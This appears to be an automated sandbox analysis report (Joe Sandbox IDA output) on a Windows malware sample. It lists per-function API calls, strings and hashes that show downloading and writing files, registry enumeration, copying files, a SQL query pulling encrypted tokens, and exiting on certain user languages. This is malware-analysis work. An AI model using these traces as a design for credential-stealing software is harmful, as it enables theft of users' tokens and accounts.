Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9

Function 022A6307 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A51
Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A68
Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A7F
Part of subcall function 022A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022A4AA0
Part of subcall function 022A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022A4AB0

InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022A6376
StrCmpCA.SHLWAPI(?,0064A480), ref: 022A63AE
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022A63F6
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022A641A
InternetReadFile.WININET(?,?,00000400,?), ref: 022A6443
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022A6471
CloseHandle.KERNEL32(?,?,00000400), ref: 022A64B0
InternetCloseHandle.WININET(?), ref: 022A64BA
InternetCloseHandle.WININET(00000000), ref: 022A64C7

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
Instruction ID: 413c442be1dec4148f1135650f1bfa83de82ea8129f239c348c78a68cfbd85f5
Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
Instruction Fuzzy Hash: F1517FB5A60318ABDF20DFE4CC54BEE7779AF04705F008098B605A71C4DBB46A85CFA5

Function 022B4FD7 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 022B4FEE

Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072

lstrcat.KERNEL32(?,00000000), ref: 022B5017
lstrcat.KERNEL32(?,00421000), ref: 022B5034

Part of subcall function 022B4B77: wsprintfA.USER32 ref: 022B4B93
Part of subcall function 022B4B77: FindFirstFileA.KERNEL32(?,?), ref: 022B4BAA

memset.MSVCRT ref: 022B507A
lstrcat.KERNEL32(?,00000000), ref: 022B50A3
lstrcat.KERNEL32(?,00421020), ref: 022B50C0

Part of subcall function 022B4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022B4BD8
Part of subcall function 022B4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022B4BEE
Part of subcall function 022B4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022B4DE4
Part of subcall function 022B4B77: FindClose.KERNEL32(000000FF), ref: 022B4DF9

memset.MSVCRT ref: 022B5106
lstrcat.KERNEL32(?,00000000), ref: 022B512F
lstrcat.KERNEL32(?,00421038), ref: 022B514C

Part of subcall function 022B4B77: wsprintfA.USER32 ref: 022B4C17
Part of subcall function 022B4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 022B4C2C
Part of subcall function 022B4B77: wsprintfA.USER32 ref: 022B4C49
Part of subcall function 022B4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 022B4C85
Part of subcall function 022B4B77: lstrcat.KERNEL32(?,0064A524), ref: 022B4CB1
Part of subcall function 022B4B77: lstrcat.KERNEL32(?,00420FF8), ref: 022B4CC3
Part of subcall function 022B4B77: lstrcat.KERNEL32(?,?), ref: 022B4CD7
Part of subcall function 022B4B77: lstrcat.KERNEL32(?,00420FFC), ref: 022B4CE9
Part of subcall function 022B4B77: lstrcat.KERNEL32(?,?), ref: 022B4CFD
Part of subcall function 022B4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 022B4D13
Part of subcall function 022B4B77: DeleteFileA.KERNEL32(?), ref: 022B4D98

memset.MSVCRT ref: 022B5192

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 4017274736-0
Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
Instruction ID: a3d428c106ec5251fe61ddb6a58749cce240c290ec4c9cea1b160a8dc5b6ab09
Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
Instruction Fuzzy Hash: 2A41D579A5031467C710F7F0EC46FD93739AF25701F404494B689660C4EEB957D88FA2

Function 022B8367 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 022B8397
RtlAllocateHeap.NTDLL(00000000), ref: 022B839E
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 022B83BF
__aulldiv.LIBCMT ref: 022B83D9
__aulldiv.LIBCMT ref: 022B83E7
wsprintfA.USER32 ref: 022B8413

Strings

@, xrefs: 022B83B4

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: @
API String ID: 2774356765-2766056989
Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction ID: 67ba8297c0b1361aebd5835e4141762d7d31a48664173f6ef1a2fec1be687522
Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction Fuzzy Hash: 82214AB1E54218ABDB00DFD4DC49FEEB7B9FB44B44F204609F605BB284C7B869008BA5

Function 0040BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

lstrlenA.KERNEL32(00000000), ref: 0040BC9F

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
lstrlenA.KERNEL32(00000000), ref: 0040BDA5
lstrlenA.KERNEL32(00000000), ref: 0040BDB9

Strings

AccountId, xrefs: 0040BCC4
SELECT service, encrypted_token FROM token_service, xrefs: 0040BBEB
AccountTokens, xrefs: 0040BABA
AccountTokens, xrefs: 0040BB49

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: b74f765d32784b8827112e529741beea93106054c3ae35f717795dfd1135bcd2
Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
Opcode Fuzzy Hash: b74f765d32784b8827112e529741beea93106054c3ae35f717795dfd1135bcd2
Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA

Function 00416770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
ExitProcess.KERNEL32 ref: 004167A5
ExitProcess.KERNEL32 ref: 004167AF
ExitProcess.KERNEL32 ref: 004167B9
ExitProcess.KERNEL32 ref: 004167C3
ExitProcess.KERNEL32 ref: 004167CD

Strings

B, xrefs: 00416780, 0041678C

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: B
API String ID: 1494266314-2248957098
Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96

Function 00409E10 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
memset.MSVCRT ref: 00409EE8
LocalAlloc.KERNEL32(00000040,?), ref: 00409F41

Strings

v10, xrefs: 00409EA3
v20, xrefs: 00409E21
@, xrefs: 00409EF1
ERROR_RUN_EXTRACTOR, xrefs: 00409E67

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 1977917189-1096346117
Opcode ID: 9c666873091c2eb9f79dea775311e52b8b7ab5e3d76554732510085addbe92b4
Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
Opcode Fuzzy Hash: 9c666873091c2eb9f79dea775311e52b8b7ab5e3d76554732510085addbe92b4
Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A

Function 022A7837 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 022A7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022A75A1
Part of subcall function 022A7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022A7618
Part of subcall function 022A7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022A7674
Part of subcall function 022A7537: GetProcessHeap.KERNEL32(00000000,?), ref: 022A76B9
Part of subcall function 022A7537: HeapFree.KERNEL32(00000000), ref: 022A76C0

lstrcat.KERNEL32(0064A668,004217FC), ref: 022A786D
lstrcat.KERNEL32(0064A668,00000000), ref: 022A78AF
lstrcat.KERNEL32(0064A668,00421800), ref: 022A78C1
lstrcat.KERNEL32(0064A668,00000000), ref: 022A78F6
lstrcat.KERNEL32(0064A668,00421804), ref: 022A7907
lstrcat.KERNEL32(0064A668,00000000), ref: 022A793A
lstrcat.KERNEL32(0064A668,00421808), ref: 022A7954
task.LIBCPMTD ref: 022A7962

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID:
API String ID: 2677904052-0
Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
Instruction ID: b551dd971c657cf79e5477bac4c212b1d94647a8817e1bb12c08b5628b3ae0bf
Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
Instruction Fuzzy Hash: 99314D76A50209EFCB04EBE0DCA4DFEB77AFB49301F105019E102676A4DA35A946CF62

Function 022A5217 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022A5231
RtlAllocateHeap.NTDLL(00000000), ref: 022A5238
InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022A5251
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022A5278
InternetReadFile.WININET(?,?,00000400,00000000), ref: 022A52A8
memcpy.MSVCRT(00000000,?,00000001), ref: 022A52F1
InternetCloseHandle.WININET(?), ref: 022A5320
InternetCloseHandle.WININET(?), ref: 022A532D

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
Instruction ID: 397345b1470707d1393d1e44ef374060e73851e656b0dcae75c44e0290633fb9
Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
Instruction Fuzzy Hash: 3C3107B8A40218ABDB20CF94DC84BDDB7B5EB48704F5081D9E609A7284D7B46AC58F98

Function 00404FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
HeapAlloc.KERNEL32(00000000), ref: 00404FD1
InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
InternetCloseHandle.WININET(00415EDB), ref: 004050B9
InternetCloseHandle.WININET(?), ref: 004050C6

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
String ID:
API String ID: 3894370878-0
Opcode ID: c5b41fa6e165f4f6bec00693b56505ba52b2ff2e1245794bd4b205df82c6c57d
Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
Opcode Fuzzy Hash: c5b41fa6e165f4f6bec00693b56505ba52b2ff2e1245794bd4b205df82c6c57d
Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99

Function 022B5777 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 022BAA87: lstrlen.KERNEL32(022A516C,?,?,022A516C,00420DDE), ref: 022BAA92
Part of subcall function 022BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022BAAEC

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 022B58AB
StrCmpCA.SHLWAPI(00000000,004210D0), ref: 022B5908
StrCmpCA.SHLWAPI(00000000,004210E0), ref: 022B5ABE

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022B5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 022B548F

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022B5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022B557F
Part of subcall function 022B5527: lstrlen.KERNEL32(00000000), ref: 022B5596
Part of subcall function 022B5527: StrStrA.SHLWAPI(00000000,00000000), ref: 022B55CB
Part of subcall function 022B5527: lstrlen.KERNEL32(00000000), ref: 022B55EA
Part of subcall function 022B5527: strtok.MSVCRT(00000000,?), ref: 022B5605
Part of subcall function 022B5527: lstrlen.KERNEL32(00000000), ref: 022B5615

StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 022B59F2
StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 022B5BA7
StrCmpCA.SHLWAPI(00000000,004210F0), ref: 022B5C73
Sleep.KERNEL32(0000EA60), ref: 022B5C82

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID:
API String ID: 3630751533-0
Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
Instruction ID: 139e1e9a3f77c8172025978433bc826e9960f973f5c2bf9238ce6bd131b2f43b
Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
Instruction Fuzzy Hash: 35E16171920304ABCB1AFBE4DD91DED737AAF56340F80812DE44666198EF786B18CF91

Function 022A1577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 022A158E

Part of subcall function 022A1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022A151B
Part of subcall function 022A1507: RtlAllocateHeap.NTDLL(00000000), ref: 022A1522
Part of subcall function 022A1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022A153E
Part of subcall function 022A1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022A155C
Part of subcall function 022A1507: RegCloseKey.ADVAPI32(?), ref: 022A1566

lstrcat.KERNEL32(?,00000000), ref: 022A15B6
lstrlen.KERNEL32(?), ref: 022A15C3
lstrcat.KERNEL32(?,004262EC), ref: 022A15DE

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

CopyFileA.KERNEL32(?,00000000,00000001), ref: 022A16CC

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022A9C53
Part of subcall function 022A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022A9C78
Part of subcall function 022A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022A9C98
Part of subcall function 022A9C27: ReadFile.KERNEL32(000000FF,?,00000000,022A16F6,00000000), ref: 022A9CC1
Part of subcall function 022A9C27: LocalFree.KERNEL32(022A16F6), ref: 022A9CF7
Part of subcall function 022A9C27: CloseHandle.KERNEL32(000000FF), ref: 022A9D01

DeleteFileA.KERNEL32(00000000), ref: 022A1756
memset.MSVCRT ref: 022A177D

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID:
API String ID: 3885987321-0
Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
Instruction ID: e83a5dadef9384a2f60cda682d08de5d0712c808d287148589712caba8c8f794
Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
Instruction Fuzzy Hash: 7C5154B19603199BCB16FBA4DD91FED737EAF54300F4041E8A60A62084EF746B89CF65

Function 022B6B87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 022B6BD3
sscanf.NTDLL ref: 022B6C00
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022B6C19
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022B6C27
ExitProcess.KERNEL32 ref: 022B6C41

Strings

u, xrefs: 022B6BE5, 022B6BEB

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID: u
API String ID: 2533653975-1051851173
Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
Instruction ID: 808cb182787545a80ee1f02b1e536fe801702ea915a9b93217549d7675bac3b4
Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
Instruction Fuzzy Hash: F421EBB5D14209AFCF09EFE4D9459EEB7BAFF48300F04852EE406A3254EB345604CB65

Function 004183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
wsprintfA.USER32 ref: 00418459
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
RegCloseKey.ADVAPI32(00000000), ref: 0041848C
RegCloseKey.ADVAPI32(00000000), ref: 00418499

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

RegQueryValueExA.ADVAPI32(00000000,00781468,00000000,000F003F,?,00000400), ref: 004184EC
lstrlenA.KERNEL32(?), ref: 00418501
RegQueryValueExA.ADVAPI32(00000000,00781360,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
RegCloseKey.ADVAPI32(00000000), ref: 00418608
RegCloseKey.ADVAPI32(00000000), ref: 0041861A

Strings

%s\%s, xrefs: 0041844D

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 7f03d597bfe2c8542a51a4803dff8254a637d5eb3e7cba84a0185e5e577ec412
Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
Opcode Fuzzy Hash: 7f03d597bfe2c8542a51a4803dff8254a637d5eb3e7cba84a0185e5e577ec412
Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4

Function 022A4A17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A51
??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A68
??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A7F
lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022A4AA0
InternetCrackUrlA.WININET(00000000,00000000), ref: 022A4AB0

Strings

<, xrefs: 022A4A30

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

